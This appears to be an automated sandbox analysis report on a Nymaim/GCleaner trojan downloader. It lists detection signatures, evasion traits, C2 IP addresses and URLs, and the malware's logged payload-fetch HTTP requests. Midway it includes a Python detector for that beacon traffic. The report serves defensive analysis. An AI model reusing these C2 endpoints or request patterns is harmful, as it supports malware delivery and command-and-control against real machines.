Windows Analysis Report
1ibwQtrqNy.exe

Overview

General Information

Sample Name: 1ibwQtrqNy.exe
Original Sample Name: 65dd3ed482f22906e70dd004a73e5cef.exe
Analysis ID: 877011
MD5: 65dd3ed482f22906e70dd004a73e5cef
SHA1: ffe8496a9d3f0a2f5571e683b466d3f3d2092172
SHA256: 15f5d9cd2cb95efaecbf0bc1a455cd6cc301848a5ba71cc4788e4b68c327382d
Tags: 32, exe, trojan

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection

Source: 2.2.Rec528.exe.400000.1.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
Source: 1ibwQtrqNy.exe Virustotal: Detection: 19%
Source: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintej Avira URL Cloud: Label: malware
Source: http://45.12.253.72/del.php Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Avira: detection malicious, Label: HEUR/AGEN.1314978
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\IFLIjCfKSqd.exe ReversingLabs: Detection: 61%
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770

Compliance

Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Unpacked PE file: 2.2.Rec528.exe.400000.1.unpack
Source: 1ibwQtrqNy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0048AC5C FindFirstFileA,6C8D69D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,LdrInitializeThunk,__Init_thread_footer,LdrInitializeThunk,LdrInitializeThunk,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00423DAD LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_00423DAD
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_10007E39 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW, 2_2_10007E39
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe File opened: C:\Users\user\AppData\Local\Temp\

Networking

Source: Traffic Snort IDS: 2044034 ET TROJAN Potential GCleaner CnC Checkin 192.168.2.3:49697 -> 45.12.253.56:80
Source: Traffic Snort IDS: 2044031 ET TROJAN GCleaner CnC Checkin M1 192.168.2.3:49698 -> 45.12.253.72:80
Source: Traffic Snort IDS: 2044032 ET TROJAN GCleaner Payload Retrieval Attempt 192.168.2.3:49698 -> 45.12.253.72:80
Source: Traffic Snort IDS: 2044037 ET TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49698
Source: Traffic Snort IDS: 2044033 ET TROJAN GCleaner CnC Checkin M2 192.168.2.3:49699 -> 45.12.253.75:80
Source: Malware configuration extractor IPs: 45.12.253.56
Source: Malware configuration extractor IPs: 45.12.253.72
Source: Malware configuration extractor IPs: 45.12.253.98
Source: Malware configuration extractor IPs: 45.12.253.75
Source: Joe Sandbox View ASN Name: CMCSUS
Source: Joe Sandbox View IP Address: 45.12.253.72
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: Rec528.exe, 00000002.00000002.443117659.000000000165A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
Source: Rec528.exe, 00000002.00000002.443117659.000000000165A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintej
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/puk.php
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/stuk.php
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/stuk.phpi
Source: Rec528.exe, 00000002.00000002.443117659.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/default/stuk.phpt
Source: Rec528.exe, 00000002.00000003.373976623.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.380624834.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.422045948.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430338328.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.395381822.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.430360645.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.415189342.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.367385976.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.388832564.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.401932962.000000000173B000.00000004.00000020.00020000.00000000.sdmp, Rec528.exe, 00000002.00000003.408599172.000000000173B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.72/del.php
Source: Rec528.exe, 00000002.00000003.430338328.0000000001723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.12.253.75/dll.php
Source: is-0I9HC.tmp.1.dr String found in binary or memory: http://www.finalrecovery.com/buy.htm
Source: is-EJ9G4.tmp.1.dr String found in binary or memory: http://www.imagemagick.org
Source: 1ibwQtrqNy.exe String found in binary or memory: http://www.innosetup.com
Source: is-2H2P0.tmp, is-2H2P0.tmp, 00000001.00000002.444700726.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.innosetup.com/
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp, is-2H2P0.tmp, 00000001.00000000.351821763.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp, is-2H2P0.tmp, is-2H2P0.tmp, 00000001.00000002.444700726.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.remobjects.com/?ps
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp, is-2H2P0.tmp, 00000001.00000002.444700726.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-2H2P0.tmp.0.dr, is-U3J98.tmp.1.dr String found in binary or memory: http://www.remobjects.com/?psU
Source: is-2H2P0.tmp, 00000001.00000002.445963159.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, Rec528.exe, 00000002.00000000.355680126.0000000001271000.00000002.00000001.01000000.00000007.sdmp, Rec528.exe.1.dr, is-EJ9G4.tmp.1.dr String found in binary or memory: https://macrorit.com/disk-wiper-commercial-license-upgrade.html
Source: is-2H2P0.tmp, 00000001.00000002.445963159.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, Rec528.exe, 00000002.00000000.355680126.0000000001271000.00000002.00000001.01000000.00000007.sdmp, Rec528.exe.1.dr, is-EJ9G4.tmp.1.dr String found in binary or memory: https://macrorit.com/free-software.html
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B40
Source: global traffic HTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: OK
    Host: 45.12.253.56
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /default/stuk.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: OK
    Host: 45.12.253.72
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /default/puk.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: OK
    Host: 45.12.253.72
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 45.12.253.75
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected (the same request was observed 9 times): GET /dll.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: B
    Host: 45.12.253.75
    Connection: Keep-Alive
    Cache-Control: no-cache
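The GET /dll.php request above is the loader's C2 fetch. What makes it detectable is not any single header but the combination: a one-letter User-Agent ("B"), a bare IP in Host, and a full browser-style Accept / Accept-Charset / Accept-Encoding set that no current browser would send next to such a User-Agent. The following is an added example written for this page, not code from the sandbox or from the malware; it parses raw HTTP requests and lists those traits. The two requests are constructed inline: the first reproduces the headers logged above, the second is a made-up benign browser request for contrast. The 8-character User-Agent cut-off is an assumed threshold.

```python
"""Score a raw HTTP request for the beacon traits this report records for the /dll.php C2 fetch."""
import ipaddress
from typing import Dict, List, Tuple

# Constructed samples: the first reproduces the request the sandbox logged (headers put back on
# their own lines); the second is an ordinary browser request made up for contrast.
OBSERVED_BEACON = (
    "GET /dll.php HTTP/1.1\r\n"
    "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, "
    "image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"
    "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n"
    "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"
    "User-Agent: B\r\n"
    "Host: 45.12.253.75\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/113.0 Safari/537.36\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Connection: keep-alive\r\n\r\n"
)

MIN_PLAUSIBLE_UA_LEN = 8   # assumed: real browser UAs are far longer than this


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw request into (method, path, lower-cased header name -> value)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IPv4/IPv6 literal (optionally with :port) rather than a name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def beacon_indicators(raw: str) -> List[str]:
    """Return the human-readable traits that make this request look like the observed beacon."""
    method, path, h = parse_request(raw)
    hits: List[str] = []
    ua = h.get("user-agent", "")
    if len(ua) < MIN_PLAUSIBLE_UA_LEN:
        hits.append(f"degenerate User-Agent {ua!r}")
    if is_bare_ip(h.get("host", "")):
        hits.append(f"Host is a bare IP address ({h['host']})")
    if method == "GET" and path.lower() == "/dll.php":
        hits.append("request path /dll.php matches the observed C2 resource")
    # Mainstream browsers dropped Accept-Charset years ago; a full Accept-* template beside a
    # one-letter User-Agent points to hard-coded headers, not a real browser.
    if "accept-charset" in h and len(ua) < MIN_PLAUSIBLE_UA_LEN:
        hits.append("browser-style Accept-* headers with a non-browser User-Agent")
    return hits


if __name__ == "__main__":
    for label, req in (("observed", OBSERVED_BEACON), ("benign", BENIGN_REQUEST)):
        print(label, beacon_indicators(req))
```

The same four conditions map directly onto an IDS content match on the User-Agent and URI, which is the kind of check behind the "Snort IDS alert" signature listed in the overview; the bare-IP Host alone is too common in legitimate traffic to alert on by itself.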
Source: 1ibwQtrqNy.exe, 00000000.00000002.447457062.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 2.2.Rec528.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Rec528.exe.3260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.443567321.0000000003260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442855707.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: 1ibwQtrqNy.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\1ibwQtrqNy.exe Code function: 0_2_00408280 0_2_00408280
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00468C28 1_2_00468C28
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00461280 1_2_00461280
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0043DE40 1_2_0043DE40
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004302D0 1_2_004302D0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004445B8 1_2_004445B8
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00434864 1_2_00434864
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0047AA90 1_2_0047AA90
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00444B60 1_2_00444B60
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0045ADE0 1_2_0045ADE0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00480F94 1_2_00480F94
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00445258 1_2_00445258
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004132E1 1_2_004132E1
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00463288 1_2_00463288
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00435568 1_2_00435568
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00445664 1_2_00445664
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_0042F874 1_2_0042F874
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00457F04 1_2_00457F04
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00409670 2_2_00409670
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00415053 2_2_00415053
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00415285 2_2_00415285
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00422329 2_2_00422329
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00419490 2_2_00419490
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004267D0 2_2_004267D0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_004109D0 2_2_004109D0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0042AB1A 2_2_0042AB1A
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0040CBC0 2_2_0040CBC0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00421C08 2_2_00421C08
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_0042AC3A 2_2_0042AC3A
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00428CB9 2_2_00428CB9
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_1000E111 2_2_1000E111
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: 2_2_1000FAC0 2_2_1000FAC0
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: String function: 10003100 appears 33 times
Source: C:\Program Files (x86)\FLSCover\Rec528\Rec528.exe Code function: String function: 0040F960 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00408CA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00403548 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00446194 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00445EC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 0043477C appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00455D54 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00407988 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00455B64 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00451DE8 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: String function: 00405A9C appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00423C4C NtdllDefWindowProc_A, 1_2_00423C4C
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_004126A0 NtdllDefWindowProc_A, 1_2_004126A0
Source: C:\Users\user\AppData\Local\Temp\is-50VJD.tmp\is-2H2P0.tmp Code function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00455514
Source: is-2H2P0.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-2H2P0.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-2H2P0.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-U3J98.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-U3J98.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-U3J98.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000003.351264625.00000000021B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs 1ibwQtrqNy.exe
Source: 1ibwQtrqNy.exe, 00000000.00000003.351368763.0000000001FD8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs 1ibwQtrqNy.exe
